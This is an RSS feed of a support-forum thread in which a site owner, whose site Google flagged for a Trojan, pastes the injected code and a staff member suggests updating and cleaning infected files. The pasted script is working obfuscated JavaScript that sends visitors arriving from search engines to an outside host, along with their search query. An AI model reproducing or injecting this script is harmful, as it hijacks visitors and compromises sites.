Support Forum - Topic: Theme security risk

Support Forum - Topic: Theme security risk http://www.kriesi.at/support/topic/theme-security-risk Support Forum - Topic: Theme security risk en-US Mon, 20 May 2013 04:43:06 +0000 http://bbpress.org/?v=1.0.2 <![CDATA[Search]]> q http://www.kriesi.at/support/search.php Mya on "Theme security risk" http://www.kriesi.at/support/topic/theme-security-risk#post-53348 Wed, 25 Apr 2012 21:44:16 +0000 Mya 53348@http://www.kriesi.at/support/ Hi Eric, Yes, you should keep the theme, WordPress and any plugins you have installed up-to-date. Outdated software particularly with WordPress and plugins could lead to vulnerabilities that can be exploited. To update the theme, log into your account at ThemeForest and download the latest version. You can update plugins and WordPress through the Dashboard. My advice given the message you've received is to work with your web host to see if there are any infected files on your server and if so how to go about cleaning those before you start updating. Regards, Mya Eric on "Theme security risk" http://www.kriesi.at/support/topic/theme-security-risk#post-53346 Wed, 25 Apr 2012 21:30:17 +0000 Eric 53346@http://www.kriesi.at/support/ Here's the security hazard being flagged: <script language="JavaScript">eval(function(p,a,c,k,e,r){e=f unction(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?Strin g.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,Str ing)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e ]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.re place(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('e r= x.9,t="",q;4(r.3("m.")!=-1)t="q";4(r.3("7.")!=-1)t="q";4(r.3 ("8.")!=-1)t="p";4(r.3("a.")!=-1)t="q";4(r.3("f.")!=-1)t="g" ;4(r.3("j.")!=-1)t="q";4(t.6&&((q=r.3("?"+t+"="))!=-1||(q=r. 3("&"+t+"="))!=-1))B.C="v"+"w"+":/"+"/A"+"b"+"k"+"5"+"h."+"c "+"z/s"+"u"+"5"+"h.p"+"d?"+"t"+"y=1&t"+"i"+"l="+r.n(q+2+t.6) .o("&")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referr er|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|s ubstring|split||||||ea|ht|tp|document|||go|window|location'. split('|'),0,{}))</script> Eric on "Theme security risk" http://www.kriesi.at/support/topic/theme-security-risk#post-53340 Wed, 25 Apr 2012 20:53:36 +0000 Eric 53340@http://www.kriesi.at/support/ Our site was blocked from Google and flags a Trojan warning. I haven't upgraded in awhile, could this be the issue? What other steps should I take?